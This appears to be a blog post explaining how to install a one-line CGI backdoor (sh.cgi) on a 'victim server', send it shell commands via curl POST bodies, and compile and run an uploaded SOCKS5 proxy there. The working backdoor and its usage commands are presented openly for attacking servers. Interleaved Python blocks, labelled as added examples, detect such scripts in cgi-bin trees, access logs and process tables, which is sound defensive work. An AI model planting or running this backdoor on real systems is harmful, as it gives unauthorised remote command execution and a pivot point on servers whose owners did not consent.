Friday, December 20, 2013

Simplest remote shell

Every true webmaster has at least once installed a remote shell (backdoor) on a victim server. I've used the simplest backdoor that ever existed.
First, create a file sh.cgi and upload it to the victim server (don't forget to set execute permissions):
#!/bin/sh

/bin/sh
That is the entire remote shell implementation: the CGI runs /bin/sh, which reads its commands from standard input, i.e. from the body of the POST request. Locally, create a file, let's say with the name 1:
echo -e "Content-Type: text/plain\r\n\r"
uname -a
id
exit 0
Test it:
> curl --data-binary @1 http://host/sh.cgi
Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
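From the other side of the fence: the two things an administrator can look for are a CGI script whose only command is a bare interpreter (exactly what sh.cgi is) and POST requests arriving at .cgi handlers. The following Python is an added example written for this post, not code from the post itself; the script contents and access-log lines in it are constructed, and the Apache common/combined log layout is assumed. It is a triage aid rather than a verdict: an ordinary form handler shows up in the POST list too.

```python
"""Added example, not part of the original post: find CGI scripts that merely
hand their stdin (the POST body) to an interpreter, like sh.cgi above, and list
POST requests to CGI handlers in an Apache-style access log. All file contents
and log lines here are constructed for the demo."""
import os
import re
import stat
import tempfile

# Interpreters that, started with no arguments, execute whatever arrives on stdin.
STDIN_INTERPRETERS = {"sh", "bash", "dash", "ksh", "zsh", "perl", "python", "python2", "python3"}


def is_shell_passthrough(script: str) -> bool:
    """True if, ignoring the shebang, comments and blank lines, the script's
    only command is a bare interpreter (optionally prefixed with 'exec').
    Any other command, or an interpreter given arguments, returns False."""
    commands = [ln.strip() for ln in script.splitlines()
                if ln.strip() and not ln.strip().startswith("#")]
    if len(commands) != 1:
        return False
    words = commands[0].split()
    if words[0] == "exec":
        words = words[1:]
    return len(words) == 1 and os.path.basename(words[0]) in STDIN_INTERPRETERS


def scan_cgi_dir(root: str):
    """Walk a cgi-bin tree and return executable files that are pass-through scripts.
    Files over 4 KiB are skipped: the scripts of interest are a couple of lines long."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if not (st.st_mode & stat.S_IXUSR) or st.st_size > 4096:
                    continue
                with open(path, errors="replace") as fh:
                    if is_shell_passthrough(fh.read()):
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


# Apache common/combined log format: client identd user [time] "request" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?:\d+|-)')


def cgi_posts(log_lines, handler_re=r"\.cgi$"):
    """Return (client, path, status) for every POST to a CGI handler.
    Legitimate form handlers show up too; the point is a short list to triage,
    in which a handler that only ever gets POSTs from one client stands out."""
    handler = re.compile(handler_re)
    found = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        if handler.search(m.group("path").split("?", 1)[0]):
            found.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return found


# Constructed sample log: a page view, a POST to sh.cgi from curl, a POST to a real form handler.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Dec/2013:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Dec/2013:10:01:09 +0000] "POST /sh.cgi HTTP/1.1" 200 187 "-" "curl/7.26.0"',
    '198.51.100.7 - - [20/Dec/2013:10:02:44 +0000] "POST /cgi-bin/search.cgi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def demo_scan():
    """Build a throwaway cgi-bin with one pass-through script and one ordinary
    CGI script (both constructed) and return the basenames the scanner flags."""
    root = tempfile.mkdtemp(prefix="cgi-demo-")
    samples = {
        "sh.cgi": "#!/bin/sh\n\n/bin/sh\n",
        "search.cgi": "#!/bin/sh\necho 'Content-Type: text/plain'\necho\n"
                      "grep -i -- \"$QUERY_STRING\" /var/lib/demo/index.txt\n",
    }
    for name, body in samples.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o755)
    return [os.path.basename(p) for p in scan_cgi_dir(root)]


if __name__ == "__main__":
    print("pass-through CGI scripts:", demo_scan())
    for client, path, status in cgi_posts(SAMPLE_LOG):
        print(f"POST to {path} from {client} -> {status}")
```

To run it against a real server, call scan_cgi_dir on the cgi-bin directory (for example /usr/lib/cgi-bin) and cgi_posts on the lines of the access log; the pass-through check is deliberately strict, so a script that does anything besides launch an interpreter is not reported.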
If you are lucky, you can also upload files, compile them and run them:
echo -e "Content-Type: text/plain\r\n\r"
cc socks.c 2>&1
./a.out 2>&1
exit 0
Download socks.c. It implements SOCKS5; the addresses are hardcoded.
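The compile-and-run step above leaves a very visible trace on the host: the web server account spawning a shell, a compiler, and then a freshly built binary. The Python below is an added example for this post, not code from the post or from socks.c; it assumes the web server runs as uid 33 (www-data, as in the id output earlier) and that the host is Linux with /proc. The SAMPLE_PROCS table is constructed to mirror the apache2 -> sh.cgi -> sh -> cc lineage that the POST body above would produce.

```python
"""Added example, not part of the original post: flag processes owned by the
web server account (uid 33, www-data, as in the id output above) whose command
is a shell, a compiler or a binary launched from a scratch directory, and show
the parent chain so the httpd -> sh -> cc lineage is visible. read_proc_table()
reads a live Linux /proc; SAMPLE_PROCS is constructed for the demo."""
import os

WEB_UID = 33  # assumption: the web server runs as www-data
SUSPECT_COMMS = {"sh", "bash", "dash", "cc", "gcc", "a.out", "perl", "python"}
SUSPECT_DIRS = ("/tmp/", "/dev/shm/")  # executables launched from world-writable dirs


def read_proc_table():
    """Collect {pid, ppid, uid, comm, exe} for every process in /proc (Linux only)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/status") as fh:
                fields = dict(line.rstrip("\n").split(":", 1) for line in fh if ":" in line)
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""  # kernel thread, or a process we are not allowed to inspect
            procs.append({
                "pid": int(pid),
                "ppid": int(fields["PPid"]),
                "uid": int(fields["Uid"].split()[0]),  # real uid
                "comm": fields["Name"].strip(),
                "exe": exe,
            })
        except (OSError, KeyError, ValueError):
            continue  # process exited while we looked, or unreadable
    return procs


def find_web_user_shells(procs, web_uid=WEB_UID):
    """Return (pid, lineage) for each web-user process that is a shell, a compiler,
    or a binary run out of a scratch directory. Lineage is comm names up to init."""
    by_pid = {p["pid"]: p for p in procs}
    hits = []
    for p in procs:
        if p["uid"] != web_uid:
            continue
        if p["comm"] not in SUSPECT_COMMS and not p["exe"].startswith(SUSPECT_DIRS):
            continue
        chain, cur = [], p
        while cur is not None and len(chain) < 16:  # bound guards against a corrupt table
            chain.append(cur["comm"])
            cur = by_pid.get(cur["ppid"])
        hits.append((p["pid"], " <- ".join(chain)))
    return hits


# Constructed process table: apache2 workers as www-data, one running sh.cgi, which
# started a shell, which is running the compiler; plus a legitimate compiled CGI.
SAMPLE_PROCS = [
    {"pid": 1,    "ppid": 0,    "uid": 0,  "comm": "init",    "exe": "/sbin/init"},
    {"pid": 900,  "ppid": 1,    "uid": 0,  "comm": "apache2", "exe": "/usr/sbin/apache2"},
    {"pid": 901,  "ppid": 900,  "uid": 33, "comm": "apache2", "exe": "/usr/sbin/apache2"},
    {"pid": 1500, "ppid": 901,  "uid": 33, "comm": "sh.cgi",  "exe": "/bin/sh"},
    {"pid": 1501, "ppid": 1500, "uid": 33, "comm": "sh",      "exe": "/bin/sh"},
    {"pid": 1502, "ppid": 1501, "uid": 33, "comm": "cc",      "exe": "/usr/bin/gcc"},
    {"pid": 1600, "ppid": 901,  "uid": 33, "comm": "search",  "exe": "/usr/lib/cgi-bin/search"},
]


if __name__ == "__main__":
    for pid, lineage in find_web_user_shells(SAMPLE_PROCS):
        print(f"{pid}: {lineage}")
    # On a live host: find_web_user_shells(read_proc_table())
```

A shell CGI that is meant to be there will be flagged as well, since its comm is the interpreter name; the lineage string is what separates an expected "sh <- apache2" from a shell that has gone on to start cc or a.out. Running the check from cron with the previous result diffed against the current one turns it into a cheap alert.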
